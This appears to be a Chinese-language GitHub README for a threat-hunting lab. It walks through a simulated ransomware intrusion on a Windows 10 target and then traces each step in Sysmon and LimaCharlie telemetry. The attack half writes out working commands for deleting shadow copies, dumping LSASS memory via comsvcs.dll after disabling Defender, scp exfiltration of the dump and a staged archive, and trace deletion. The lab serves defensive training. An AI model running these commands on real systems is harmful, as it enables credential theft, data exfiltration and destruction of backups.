cyberdome80/Windows-Threat-Hunting-Lab

# 🛡️ Windows 遥测强化与企业威胁狩猎实验室 一个端到端的蓝队模拟环境，复现多阶段入侵生命周期（勒索软件抑制、高级凭据访问、双重勒索数据暂存、数据外泄和加密影响）。该实验室追踪通过 Microsoft Sysmon 生成的终端事件，并在云原生 LimaCharlie EDR/SIEM 平台中处理实时遥测管道，最终实现主动的检测工程自动化。 ## 📊 快速链接与交付成果 * **项目演示链接：** [👉 点击此处查看 Google Slides 演示文稿](PASTE_YOUR_GOOGLE_SLIDES_SHARE_LINK_HERE) * **目标机器架构：** Windows 10 Home（强化终端传感器节点） * **攻击基础设施：** 通过私有 Hypervisor 网络桥接的 Kali Linux (`192.168.10.0/24`) * **EDR 控制平面：** LimaCharlie 云原生安全运营界面 ## 🏗️ 1. 架构与实验室环境基线 此环境模拟了企业边界入侵区域，外部攻击者跨越网络边界，在本地资产上建立命令与控制（C2）立足点。 ### 基础设施蓝图 * **攻击者节点 (Kali Linux)：** 部署于私有虚拟子网段 `192.168.10.250`。 * **目标终端 (Windows 10)：** 部署于静态本地节点 `192.168.10.9`。 * **遥测转发器 (Microsoft Sysmon)：** 在本地部署，用于捕获高级事件阵列（进程创建、网络连接、文件完整性事件、进程访问内存句柄）。 * **SIEM 引擎 (LimaCharlie EDR)：** 通过活动主机传感器配置进行部署，促进实时检测解析和实时自动化遥测分析流。 ## 🛑 2. 入侵模拟与取证时间线分析 ### 用例 1：抑制系统恢复（勒索软件前兆） * **MITRE ATT&CK 映射：** T1490 — 抑制系统恢复 #### 📝 用例介绍 在勒索软件攻击者使用加密锁定目标计算机之前，他们面临着一个主要障碍：自动系统备份。现代操作系统经常保存文件的隐藏快照（称为卷影副本），这样如果出现故障，你可以轻松地将系统及时回滚并恢复干净的数据。 如果攻击者保留这些备份不动，受害公司将直接免费恢复他们的机器，而不会支付赎金。因此，攻击者的第一步就是搜寻并彻底销毁硬盘上的每一个备份副本。通过清除系统的安全网，攻击者将受害者逼入绝境，使他们别无选择，只能支付赎金以恢复运营上线。 #### 📸 步骤 1：网络侦察（寻找目标） **操作：** 攻击者使用名为 Nmap 的网络扫描工具扫描网络。这使他们能够发现目标 Windows 计算机并查明其真实名称（`DESKTOP-BU3CNBB`）以及敞开的大门，而无需登录。 #### 📸 步骤 2：远程访问（获取立足点） **操作：** 一旦攻击者知道计算机在网络上是活动的，他们就会使用加密的 SSH 连接，通过 22 端口利用窃取或发现的凭据远程登录到该机器。现在，攻击者拥有了一个活动的远程命令行连接来控制受害者的系统。 #### 📸 步骤 3：远程访问与账户验证 **命令 1：** `whoami` * **通俗解释：** 此命令询问计算机：*“我当前是以什么身份登录的？”* 系统响应 `desktop-bu3cnbb\target-pc2`，向远程攻击者确认他们的登录成功，并且他们对机器拥有管理控制权。 **命令 2：** `vssadmin delete shadows /all /quiet` * **通俗解释：** 此命令告诉 Windows 操作系统定位硬盘上的每一个自动文件备份快照，并立即将它们全部删除。`/quiet` 标志确保计算机在后台静默删除它们，而不会为用户弹出任何警告消息。 ### 用例 2：高权限凭据访问（LSASS 内存转储） * **MITRE ATT&CK 映射：** T1003.001 — 操作系统凭据转储：LSASS 内存 #### 📝 用例介绍 当攻击者获得对单台计算机的初始访问权限时，他们通常被困在权限有限的标准用户帐户中。为了接管整个企业网络，攻击者需要管理密码才能登录其他系统 [3.3]。 在此阶段，攻击者将目标对准称为 **LSASS** (`lsass.exe`) 的核心 Windows 安全程序，该程序管理活动的用户会话，并在计算机的运行内存 (RAM) 中临时保存加密的登录密钥 [3.3]。通过将该程序内存空间中的所有内容复制并保存到隐藏文件中，攻击者创建了系统活动密码的永久快照 [3.3]。然后，该文件可以被窃取并离线解锁，为威胁行为者提供破坏企业网络其余部分所需的管理凭据 [3.3]。 #### 📸 步骤 1：进程侦察与杀毒软件阻碍 **命令 1：** `tasklist /fi "imagename eq lsass.exe"` * **通俗解释：** 此命令搜索计算机以查找 Windows 密码库 (`lsass.exe`) 的确切跟踪编号（称为进程 ID） [3.3]。攻击者需要此特定编号 (`604`) 来将其攻击工具指向它。 **命令 2：** `rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 604 C:\Users\Target-PC2\Documents\lsass.dmp full` * **通俗解释：** 此命令告诉计算机获取该密码库内存的完整快照，并将其保存为名为 `lsass.dmp` 的文件 [3.3]。 * **结果：** 由于计算机的安全卫士仍处于开启状态，Windows Defender 立即阻止了该命令并大喊 **“访问被拒绝，”** 从而使密码免于被复制。 #### 📸 步骤 2：绕过保护（静默执行） **操作：** 攻击者打开 Windows 设置菜单，暂时关闭实时安全卫士，并第二次输入完全相同的 `rundll32.exe` 命令。 * **通俗解释：** 随着安全卫士暂停，命令完美运行。它不发出任何噪音，不显示任何错误消息，并直接返回到干净的提示行。这意味着计算机静默允许了内存快照的发生。 #### 📸 步骤 3：验证窃取的凭据文件 **命令 3：** `dir C:\Users\Target-PC2\Documents\lsass.dmp` * **通俗解释：** 此命令查看 Documents 文件夹内部，以确认隐藏文件是否确实在硬盘上生成了。 * **证据：** 屏幕上的文本明确证明已创建一个永久的 **55,848,099 字节文件**。攻击者成功地将活动系统密码的原始快照复制到了本地磁盘上。 #### 📸 步骤 4：将凭据快照外泄至攻击者节点 **命令 4：** `scp Target-PC2@192.168.10.9:Documents/lsass.dmp ~/Desktop/` * **通俗解释：** 在攻击者的 Kali Linux 机器的本地终端上运行，此命令使用安全复制协议 (SCP) 跨网络连接到受害计算机。它将 55MB 的 `lsass.dmp` 密码快照文件直接下载到攻击者自己的桌面上。 * **最终证据：** 在 Kali 上运行本地文件列表检查 (`ls -la`) 确认文件已完整到达且大小保持不变（**55,848,099 字节**）。攻击者现在完全掌握了受害者活动内存库的永久副本，准备对其进行离线破解以获取管理网络密码。 ### 用例 3：双重勒索收集、数据暂存与外泄 * **MITRE ATT&CK 映射：** T1074.001 — 数据暂存：本地数据暂存 & T1048 — 通过替代协议外泄 #### 📝 用例介绍 在现代网络攻击中，威胁行为者实行 **双重勒索**。他们在锁定系统*之前*窃取公司机密文档的副本。如果公司因为有离线备份而拒绝支付赎金，攻击者就会威胁在暗网上泄露他们的机密。 为了加快窃取速度并避免引起警报，攻击者不会逐一下载文件。他们把所有东西收集到一个临时文件夹中，将其归档为单个 `.zip` 文件，通过网络隧道下载，然后删除本地文件以清除痕迹。 #### 📸 步骤 1：自动化数据暂存（打包机密） **命令 1：** `powershell Compress-Archive -Path C:\CorporateData -DestinationPath C:\Windows\Temp\sensitive_exfil.zip -Force` * **通俗解释：** 此命令打包包含私有文件的整个企业数据文件夹，并将其压缩为位于 Windows Temp 目录中名为 `sensitive_exfil.zip` 的隐藏归档文件。 #### 📸 步骤 2：数据外泄（窃取包裹） **命令 2：** `scp Target-PC2@192.168.10.9:../../Windows/Temp/sensitive_exfil.zip ~/Desktop/` * **通俗解释：** 从攻击者的本地 Kali Linux 机器运行，此命令跨网络隧道下载隐藏的 zip 包，并将其直接保存到攻击者的桌面背景上。 #### 📸 步骤 3：验证窃取的数据集合 **命令 3：** `ls -la` * **通俗解释：** 攻击者检查其本地文件夹工作区，以确保被盗的企业记录已成功到达并完全归其所有。 #### 📸 步骤 4：防御规避（掩盖攻击痕迹） **命令 4：** `del C:\Windows\Temp\sensitive_exfil.zip` * **通俗解释：** 现在攻击者已经窃取了文件，他们运行删除命令从受害者的硬盘上擦除 `.zip` 归档文件。这掩盖了他们的行踪，并在他们触发勒索软件之前清除了任何明显的数据盗窃迹象。 ### 用例 4：目标达成（加密勒索软件影响） * **MITRE ATT&CK 映射：** T1486 — 为造成影响而加密数据 #### 📝 用例介绍 一旦系统备份被销毁、密码被窃取，并且机密文件被安全地复制到攻击者的机器上，入侵生命周期就到达了最后也是最毁灭性的阶段：**数据加密**。 攻击者引爆勒索软件 payload，使用自定义代码循环扰乱受害者的数据。这会锁定磁盘上的所有企业文档，附加无法读取的文件扩展名，并在桌面上投放一封高度显眼的勒索信，要求付款。 #### 📸 步骤 1：勒索软件引爆与执行 **命令 1：** `powershell.exe -c "Get-ChildItem C:\CorporateData\* ..."` * **通俗解释：** 此脚本搜索整个企业数据文件夹，读取每个文本和电子表格文件，将其内容扰乱为不可读的代码文本块，使用 `.locked` 文件扩展名重命名，并删除原始可读副本。 * **最终影响：** 与此同时，该脚本直接在受害者的桌面上生成一个名为 `READ_ME_RANSOM.txt` 的新文本文件，警告他们其公司文件已被入侵，并要求支付赎金才能解锁。 ## 🔍 2. 威胁狩猎与 SIEM 遥测分析 #### 📝 威胁狩猎介绍 初级分析师只是查看计算机屏幕上是否有病毒警告。专业的企业分析师使用像 **LimaCharlie** 这样的集中式云平台结合本地 Windows 日志来搜寻隐藏的数字足迹。 以下是取证调查轨迹。它讲述了防御者如何将本地系统线索连接到云端告警，以揭开攻击者的整个策略。 ### 🛡️ 阶段 1 追踪：威胁狩猎备份删除 * **攻击者的操作：** 黑客执行了 `vssadmin delete shadows /all /quiet` 以销毁所有自动系统备份。 #### 📸 本地足迹：Windows Sysmon 事件 ID 1（进程创建） * **防御者的发现：** 通过找到此本地日志，防御者发现了攻击者的主要动机：**抑制系统恢复**。防御者明白网络上有黑客，并且正在故意破坏系统的安全网，以确保公司无法免费恢复其文件。 #### 📸 云端遥测：SIEM 实时订阅流 * **防御者的发现：** 在云控制台中，防御者揭开了 **攻击的来源**。通过检查进程谱系，防御者看到命令提示符 (`cmd.exe`) 是由 OpenSSH 服务 (`sshd.exe`) 生成的。防御者现在明白这不是本地员工的失误；远程攻击者已经从外部世界成功登录到了该机器。 #### 📸 云端遥测：历史时间线索引 * **防御者的发现：** 通过查看历史时间线，防御者确定了 **的确切时间戳** (`20:53:19`)。防御者明白，即使攻击者清除了屏幕或断开连接，云平台也已将事件永久锁定在历史记录中，使安全团队能够构建准确的安全违规取证时间线。 ### 🛡️ 阶段 2 追踪：威胁狩猎内存转储 * **攻击者的操作：** 黑客禁用了杀毒卫士，并运行了一个脚本工具 (`rundll32.exe`) 将计算机的密码存储服务 (`lsass.exe`) 克隆到文件中。 #### 📸 本地足迹：Windows Sysmon 事件 ID 1（进程创建） * **防御者的发现：** 防御者在硬盘上找到了第二次成功的攻击执行。通过读取脚本参数，防御者明白黑客使用了高级的“Living off the Land”技巧（使用受信任的内置 Windows 工具运行恶意内存转储），从而在未被发觉的情况下绕过了基本的文件过滤。 #### 📸 本地足迹：Windows Sysmon 事件 ID 10（进程访问句柄） * **防御者的发现：** 此日志作为 **凭据被盗的最终证据**。防御者看到外部应用程序请求了一个深层句柄来查看密码存储库 (`lsass.exe`) 内部。防御者瞬间明白攻击者已经成功复制了系统的活动密码和安全密钥。 #### 📸 云端遥测：高完整性进程检测 * **防御者的发现：** 在云 SIEM 内部，防御者检查了攻击期间使用的权限级别。通过发现 **`"IntegrityLevel": "High"`**，防御者明白攻击者已成功获得机器上的完全管理权限，使他们有权控制整个操作系统。 #### 📸 云端遥测：规避技术映射 * **防御者的发现：** 防御者暴露了攻击者的脚本工具。通过看到 `powershell.exe` 被用于启动内存转储，防御者明白了黑客用来绕过标准系统边界的确切脚本方法。 #### 📸 云端遥测：时间线验证 * **防御者的发现：** 防御者追踪被盗密码文件的保存位置。时间线日志直接指向 `C:\Users\Target-PC2\Documents\lsass.dmp`。防御者现在确切知道硬盘上的哪个文件包含了受损的公司密钥，并且必须立即安全地将其删除。 ### 🛡️ 阶段 3 追踪：威胁狩猎数据泄露（外泄） * **攻击者的操作：** 黑客将企业文本文档打包成 `.zip` 归档文件，并使用安全文件传输工具 (`scp`) 将文件通过网络复制到其 Kali Linux 机器上。 #### 📸 本地足迹：Windows Sysmon 事件 ID 11（文件创建） * **防御者的发现：** 防御者发现了 **数据暂存** 阶段。通过在系统的临时目录 (`C:\Windows\Temp\`) 中定位 `sensitive_exfil.zip` 的创建，防御者明白攻击者正在主动将私有公司数据库捆绑到一个包中，以便他们可以轻松地通过一次下载窃取它们。 #### 📸 本地足迹：Windows Sysmon 事件 ID 3（网络连接） * **防御者的发现：** 此日志捕获了企业数据跨越网络边界传输的确切时刻。防御者发现了来自 OpenSSH 后台程序 (`sshd.exe`) 的活动 **事件 ID 3（网络连接）**。 尽管原始数字 22 已被系统转换，但程序名称告诉防御者，外部网络地址 (`192.168.10.250`) 正在使用活动的 22 端口远程隧道从机器上拉取文件。防御者立即将其识别为 **数据外泄违规** 并标记了黑客的确切网络身份。 #### 📸 云端遥测：实时订阅网络管道日志 * **防御者的发现：** 云控制台突出显示了实时的出站流量。防御者看到了通过 22 端口传输数据的网络管道，明白攻击者正在利用授权的网络 shell 连接来隐藏其未经授权的数据窃取行为。 #### 📸 云端遥测：综合会话分析 * **防御者的发现：** 防御者使用此云网络视图捕获正在进行的活跃 **数据外泄违规**。通过过滤集中式日志，防御者标记了与系统的安全复制文件实用程序 (`sshd.exe`) 直接关联的关键 `NETWORK_CONNECTIONS` 事件。 防御者立即明白，外部攻击者正在主动使用机器的安全网络通道从计算机上复制文件。这一视觉证据使安全团队能够识别用于窃取信息的确切未经授权的应用程序，并证明机密数据已通过线缆被盗。 ### 🛡️ 阶段 4 追踪：威胁狩猎勒索软件加密 * **攻击者的操作：** 黑客运行了恶意脚本循环，使用 `.locked` 扩展名加密公司文件夹，并将勒索说明文件投放到桌面背景上。 #### 📸 本地足迹：Windows 系统影响视图 (GUI) * **防御者的发现：** 防御者目睹了 **目标达成** 阶段。查看屏幕，防御者明白了攻击的最终影响：所有主要公司文档都已被销毁并使用 `.locked` 扩展名锁定，企业现在面临 1 BTC 的活跃勒索要求。 #### 📸 本地足迹：Windows Sysmon 事件 ID 11（勒索文件投放） * **防御者的发现：** 本地日志追踪到了勒索要求的投放。防御者发现 PowerShell 脚本明确地将一个名为 `READ_ME_RANSOM.txt` 的文件直接写入了用户的桌面配置文件路径，确认勒索软件 payload 已被引爆。 #### 📸 云端遥测：实时订阅文件创建事件 * **防御者的发现：** 云端实时订阅记录了勒索软件消息命中桌面界面的确切时刻。防御者明白，自动化攻击脚本当前正在桌面上修改文件，并可以触发立即的事件响应隔离协议，以阻止脚本传播到其他网络驱动器。 #### 📸 云端遥测：历史威胁映射 * **防御者的发现：** 通过在 SIEM 历史记录中搜索 `ransom` 一词，防御者隔离了 `23:11:10` 的确切文件修改警报。防御者了解了勒索软件循环的完整执行路径，保留原始进程字符串作为最终事件响应报告的确凿证据。

标签：AI合规, EDR, 勒索软件防御, 安全, 脆弱性评估, 超时处理